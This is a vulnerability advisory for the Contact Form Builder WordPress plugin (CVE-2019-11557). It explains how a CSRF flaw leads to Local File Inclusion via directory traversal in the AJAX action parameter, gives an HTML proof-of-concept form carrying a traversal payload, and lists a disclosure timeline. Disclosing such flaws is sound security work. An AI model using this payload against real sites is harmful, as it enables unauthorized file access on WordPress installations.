Contact Form Builder [CSRF → LFI]
Contact Form Builder suffers for a CSRF issue that could lead to a Local File Inclusion attack.
Description
Plugin implements the following AJAX actions:
ContactFormMakerPreview
ContactFormmakerwdcaptcha
nopriv_ContactFormmakerwdcaptcha
CFMShortcode
All of them call the function contact_form_maker_ajax
. This function dynamicaly loads a file defined in $_GET['action']
or $_POST['action']
if the former is not defined. Because of the way WordPress defines the AJAX action a user could define the plugin action in the $_GET['action']
and AJAX action in $_POST['action']
. Leveraging that and the fact that no sanitization is performed on the $_GET['action']
, a malicious actor can perform a CSRF attack to load a file using directory traversal thus leading to Local File Inclusion vulnerability.
PoC
<form method="post" action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<select name="action">
<option value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
INFO
- 17 March 2019
- Pan Vag
- web-dorado.com
- wordpress.org
- 1.0.67
- WordPress 5.1.1
- CVE-2019-11557
TIMELINE
- 2019-03-17:
Discovered - 2019-03-17:
Vendor notified through contact form on 10web.io - 2019-03-18:
Vendor responded - 2019-03-20:
Patch released (incomplete) - 2019-03-20:
Notified vendor about the incomplete patch - 2019-03-22:
Vendor responded that they will include a CSRF protection in a "future upgrade"